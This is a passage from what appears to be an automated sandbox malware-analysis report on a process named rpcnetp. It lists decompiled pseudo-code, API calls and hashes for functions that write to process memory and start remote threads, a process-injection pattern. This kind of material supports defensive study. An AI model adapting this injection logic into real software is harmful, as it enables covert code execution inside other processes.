				ExitThread(0);
			}












0x72b21c7b
0x72b21c7d
0x72b21c82
0x72b21c94
0x72b21c9f
0x72b21ca1
0x72b21ca9
0x72b21cae
0x72b21cb1
0x72b21cb7
0x72b21cca
0x72b21ce4
0x72b21cea
0x72b21cf1
0x72b21cfa
0x72b21d03
0x72b21d03
0x72b21d0b
0x72b21d0b
0x72b21d1a
0x72b21d20

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,72B25398,00000010), ref: 72B21C8E
  • GetStdHandle.KERNEL32(000000F4), ref: 72B21C99
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 72B21CC2
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 72B21CD7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21C37,?), ref: 72B21FB7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
    • Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
    • Part of subcall function 72B21F95: ResumeThread.KERNEL32(?), ref: 72B220C1
    • Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
    • Part of subcall function 72B21F95: CloseHandle.KERNEL32(?), ref: 72B220D9
  • LocalFree.KERNEL32(00000000), ref: 72B21D0B
  • ExitThread.KERNEL32 ref: 72B21D20
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
  • String ID:
  • API String ID: 3187294079-0
  • Opcode ID: eb10873bd4b33ee44731de4874c76e1266a4d0df7197caff664842dd91625b3e
  • Instruction ID: c86dc8486e0665793866c7a9820250b529532658d765509b66e6b22a8b28303e
  • Opcode Fuzzy Hash: eb10873bd4b33ee44731de4874c76e1266a4d0df7197caff664842dd91625b3e
  • Instruction Fuzzy Hash: 52113A7295034AEFDB118FA5CC48FEE7BF8EB44361F158229E529B7192D7389501CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
			E00A11C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0xa15398);
				E00A14A94(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E00A11F95(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}











0x00a11c7b
0x00a11c7d
0x00a11c82
0x00a11c94
0x00a11c9f
0x00a11ca1
0x00a11ca9
0x00a11cae
0x00a11cb1
0x00a11cb7
0x00a11cca
0x00a11ce4
0x00a11cea
0x00a11cf1
0x00a11cfa
0x00a11d03
0x00a11d03
0x00a11d0b
0x00a11d0b
0x00a11d1a
0x00a11d20

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,00A15398,00000010), ref: 00A11C8E
  • GetStdHandle.KERNEL32(000000F4), ref: 00A11C99
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 00A11CC2
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 00A11CD7
    • Part of subcall function 00A11F95: GetStdHandle.KERNEL32(000000F4,00A153A8,000006C0,00A11C37,?), ref: 00A11FB7
    • Part of subcall function 00A11F95: GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A12033
    • Part of subcall function 00A11F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 00A1205F
    • Part of subcall function 00A11F95: ResumeThread.KERNEL32(?), ref: 00A120C1
    • Part of subcall function 00A11F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A120D0
    • Part of subcall function 00A11F95: CloseHandle.KERNEL32(?), ref: 00A120D9
  • LocalFree.KERNEL32(00000000), ref: 00A11D0B
  • ExitThread.KERNEL32 ref: 00A11D20
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
  • String ID:
  • API String ID: 3187294079-0
  • Opcode ID: a37cf31ac386f91ef938f27a3bc639ef983b3d1810c9d360dab52811b546b64a
  • Instruction ID: 0d35ea56b8990a247a879ad1b9c30cd8043350959af957f06f2c6be90fb46c1a
  • Opcode Fuzzy Hash: a37cf31ac386f91ef938f27a3bc639ef983b3d1810c9d360dab52811b546b64a
  • Instruction Fuzzy Hash: 3E110A71E4024AEFDB10DFA4D849FEE7BB8AB08761F148115F625A61A0D7389982CB11
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t25 = _a4;
					 *((intOrPtr*)(_t40 + 0x1b48)) = _t25;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *((intOrPtr*)(_t25 + 0x70));
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E72B216BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16);
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8);
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}








0x72b21779
0x72b2177c
0x72b21784
0x72b2178c
0x72b21792
0x72b21799
0x72b217a7
0x72b217ad
0x72b217c7
0x72b217cd
0x72b217cf
0x72b217db
0x72b21812
0x72b21813
0x72b217e1
0x72b217e4
0x72b21801
0x72b2180a
0x72b217e6
0x72b217f1
0x72b217f7
0x72b217ff
0x00000000
0x00000000
0x00000000
0x00000000
0x72b217ff
0x72b217e4
0x72b21819
0x72b21826

APIs
  • InitializeCriticalSection.KERNEL32(?), ref: 72B217AD
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B217C0
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B217CD
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72B217F1
  • SetThreadPriority.KERNEL32(?,?), ref: 72B2180A
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Create$EventThread$CriticalInitializePrioritySection
  • String ID:
  • API String ID: 2454249074-0
  • Opcode ID: 215d35c185ac9572e93c9689a794df72fea7adc102145aefd910f693528aebe6
  • Instruction ID: 2b7b849261d314237348428b04d03b57a499ce12b49900591cbacb009e5b40d1
  • Opcode Fuzzy Hash: 215d35c185ac9572e93c9689a794df72fea7adc102145aefd910f693528aebe6
  • Instruction Fuzzy Hash: 41117C32110784AFC7319F2ACC84EE7BBF9FBC9751B14891EF96A86102E331A440DB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A11775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t25 = _a4;
					 *((intOrPtr*)(_t40 + 0x1b48)) = _t25;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *((intOrPtr*)(_t25 + 0x70));
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E00A116BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16);
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8);
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}








0x00a11779
0x00a1177c
0x00a11784
0x00a1178c
0x00a11792
0x00a11799
0x00a117a7
0x00a117ad
0x00a117c7
0x00a117cd
0x00a117cf
0x00a117db
0x00a11812
0x00a11813
0x00a117e1
0x00a117e4
0x00a11801
0x00a1180a
0x00a117e6
0x00a117f1
0x00a117f7
0x00a117ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00a117ff
0x00a117e4
0x00a11819
0x00a11826

APIs
  • InitializeCriticalSection.KERNEL32(?), ref: 00A117AD
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A117C0
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A117CD
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A117F1
  • SetThreadPriority.KERNEL32(?,?), ref: 00A1180A
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Create$EventThread$CriticalInitializePrioritySection
  • String ID:
  • API String ID: 2454249074-0
  • Opcode ID: 374e420e052abf54fab628d5c8f3aae0946750b395cf08600343ccbb62c642bc
  • Instruction ID: d1c4f3c571ecc49952daf0508d9f171a0efcf99069b6d132ea9533ac55a8680b
  • Opcode Fuzzy Hash: 374e420e052abf54fab628d5c8f3aae0946750b395cf08600343ccbb62c642bc
  • Instruction Fuzzy Hash: 58116036500784AFCB319F659C44DE7BBF9FB89711B14891EFAA982101E331A981DB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 38%
			E72B224BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0;
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}









0x72b224c2
0x72b224c7
0x72b224d1
0x72b224d7
0x72b224df
0x72b224e1
0x72b224e7
0x72b224ec
0x72b2252f
0x72b224ee
0x72b224f1
0x72b224fb
0x72b22500
0x72b22501
0x72b22504
0x72b2250a
0x72b22506
0x72b22506
0x72b22506
0x72b22514
0x72b2251a
0x72b2251a
0x72b224f3
0x72b224f3
0x72b224f3
0x72b22523
0x72b22523
0x72b22539

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 72B224E1
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2250C
  • GetExitCodeThread.KERNEL32(?,?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2251A
  • CloseHandle.KERNEL32(?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B22523
  • TerminateProcess.KERNEL32(?,00000000,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2252F
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
  • String ID:
  • API String ID: 1317926807-0
  • Opcode ID: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction ID: 43fb7a0f769fbdbb6116ecc8b05a183b5ca6aff15e3d6e9499a38349c8af174b
  • Opcode Fuzzy Hash: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction Fuzzy Hash: E6113971401228BFCB225F56CC58ECF7FB9EF497A2F118505F50AA6152D3309651CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B2253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E72B23223(E72B22314), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}







0x72b22541
0x72b22548
0x72b2256f
0x72b22573
0x72b22578
0x72b22583
0x72b2258a
0x72b2258a
0x72b22595

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22548
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 72B22569
  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22578
  • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22583
  • CloseHandle.KERNEL32(00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B2258A
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
  • String ID:
  • API String ID: 3128336559-0
  • Opcode ID: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction ID: 009471020fc4e506f9a1f4f8785b6e6bc51251f61989519d315005196ebec4ca
  • Opcode Fuzzy Hash: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction Fuzzy Hash: 9CF09077450344BFDB118795CC49FAF36F8DB857A1F310618F615A31C2DB74A5019725
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A1253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E00A13223(E00A12314), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}







0x00a12541
0x00a12548
0x00a1256f
0x00a12573
0x00a12578
0x00a12583
0x00a1258a
0x00a1258a
0x00a12595

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12548
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00A12569
  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12578
  • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12583
  • CloseHandle.KERNEL32(00000000,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A1258A
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
  • String ID:
  • API String ID: 3128336559-0
  • Opcode ID: c870207994f9fbf493ff01a369ddb4283b75751882f5e47db17335e0c142e287
  • Instruction ID: b1093ab7c5c6a0f5073837ebc1c413455d88f623481f241cd39408b05255f513
  • Opcode Fuzzy Hash: c870207994f9fbf493ff01a369ddb4283b75751882f5e47db17335e0c142e287
  • Instruction Fuzzy Hash: 92F0B436900104BFDB00DBD4DC49FFE367CEB89721F204204F711921D0DB78AA829724
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%
			E72B229E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				void* _t66;

				_t61 = __edx;
				_push(0x40);
				_push(0x72b253e8);
				E72B24A94(__ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t66 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				_t63 = 0;
				 *(_t66 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t66 - 0x24);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t66 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t66 + 0x10)) - _t63;
					if(_t53 >  *((intOrPtr*)(_t66 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t66 - 0x24));
					}
					_push(_t66 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t66 + 0xc)) + _t63);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t66 - 0x1c)) != _t58) {
						_t63 = _t63 +  *((intOrPtr*)(_t66 - 0x1c));
						 *((intOrPtr*)(_t66 - 0x28)) = _t63;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t63;
				if(_t63 != _t58) {
					lstrcpyA(_t66 - 0x50, "TagId");
					 *((intOrPtr*)(_t66 - 0x1c)) = 0x28;
					_push(0);
					_push(_t66 - 0x1c);
					_push(_t66 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c88))() != 0) {
						lstrcpyA(_t65 + 0x3cb0, _t66 - 0x50);
					}
					 *((intOrPtr*)(_t66 - 0x20)) = E72B22F96( *((intOrPtr*)(_t66 + 0xc)), _t63);
					_t58 = 0;
				}
				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t66 - 0x20)) == _t58) {
					 *(_t65 + 0x5c) =  *(_t65 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t58;
				}
				return E72B2159C( *((intOrPtr*)(_t66 - 0x20)), _t61);
			}









0x72b229e4
0x72b229e4
0x72b229e6
0x72b229eb
0x72b229f0
0x72b229f3
0x72b229f5
0x72b229f8
0x72b229fa
0x72b229fd
0x72b229fd
0x72b229fe
0x72b22a02
0x72b22a03
0x72b22a11
0x00000000
0x00000000
0x72b22a1b
0x72b22a20
0x72b22a22
0x72b22a22
0x72b22a28
0x72b22a29
0x72b22a2f
0x72b22a30
0x72b22a3e
0x72b22a45
0x72b22a48
0x00000000
0x72b22a48
0x00000000
0x72b22a3e
0x72b22a50
0x72b22a54
0x72b22a65
0x72b22a67
0x72b22a6e
0x72b22a73
0x72b22a77
0x72b22a78
0x72b22a7d
0x72b22a8b
0x72b22a98
0x72b22a98
0x72b22aa3
0x72b22aa6
0x72b22aa6
0x72b22aa8
0x72b22ac5
0x72b22ac7
0x72b22ace
0x72b22ace
0x72b22ad8

APIs
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: c628525553903b6a1cf8c10ac42aa78a7b08b5903878eebb30386322a8f7070c
  • Instruction ID: 937e6d634195ed91134bc96762776da25fbf2bc6e85c9379a4a0c7bdf025302a
  • Opcode Fuzzy Hash: c628525553903b6a1cf8c10ac42aa78a7b08b5903878eebb30386322a8f7070c
  • Instruction Fuzzy Hash: 0031EAB190074A9FEB21CFA9CD849EEB7F8FF49301F104529E56AF6550DB70AA00CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E00A129E4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				intOrPtr _t62;
				intOrPtr _t64;
				void* _t65;

				_push(0x40);
				_push(0xa153e8);
				E00A14A94(__ebx, __edi, __esi);
				_t64 =  *((intOrPtr*)(_t65 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t65 - 0x20)) = 0;
				_t62 = 0;
				 *(_t65 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t65 - 0x24);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t65 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t65 + 0x10)) - _t62;
					if(_t53 >  *((intOrPtr*)(_t65 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t65 - 0x24));
					}
					_push(_t65 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t65 + 0xc)) + _t62);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t65 - 0x1c)) != _t58) {
						_t62 = _t62 +  *((intOrPtr*)(_t65 - 0x1c));
						 *((intOrPtr*)(_t65 - 0x28)) = _t62;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x14)))) = _t62;
				if(_t62 != _t58) {
					lstrcpyA(_t65 - 0x50, "TagId");
					 *((intOrPtr*)(_t65 - 0x1c)) = 0x28;
					_push(0);
					_push(_t65 - 0x1c);
					_push(_t65 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c88))() != 0) {
						lstrcpyA(_t64 + 0x3cb0, _t65 - 0x50);
					}
					 *((intOrPtr*)(_t65 - 0x20)) = E00A12F96( *((intOrPtr*)(_t65 + 0xc)), _t62);
					_t58 = 0;
				}
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t65 - 0x20)) == _t58) {
					 *(_t64 + 0x5c) =  *(_t64 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x14)))) = _t58;
				}
				return E00A1159C( *((intOrPtr*)(_t65 - 0x20)));
			}








0x00a129e4
0x00a129e6
0x00a129eb
0x00a129f0
0x00a129f3
0x00a129f5
0x00a129f8
0x00a129fa
0x00a129fd
0x00a129fd
0x00a129fe
0x00a12a02
0x00a12a03
0x00a12a11
0x00000000
0x00000000
0x00a12a1b
0x00a12a20
0x00a12a22
0x00a12a22
0x00a12a28
0x00a12a29
0x00a12a2f
0x00a12a30
0x00a12a3e
0x00a12a45
0x00a12a48
0x00000000
0x00a12a48
0x00000000
0x00a12a3e
0x00a12a50
0x00a12a54
0x00a12a65
0x00a12a67
0x00a12a6e
0x00a12a73
0x00a12a77
0x00a12a78
0x00a12a7d
0x00a12a8b
0x00a12a98
0x00a12a98
0x00a12aa3
0x00a12aa6
0x00a12aa6
0x00a12aa8
0x00a12ac5
0x00a12ac7
0x00a12ace
0x00a12ace
0x00a12ad8

APIs
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: e7c7d7a40c3976d90b9d9c98f2641f828e691ed448d21b143ad837a65f312a7b
  • Instruction ID: dddc32c03dc397f91921428a20a935034d069cde69a29059b6b10be023fa4b5d
  • Opcode Fuzzy Hash: e7c7d7a40c3976d90b9d9c98f2641f828e691ed448d21b143ad837a65f312a7b
  • Instruction Fuzzy Hash: 2131F671A0064AAFDF21CFA9CC85AEEB7F9FF48340F144529E565E6190DB70EA50CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
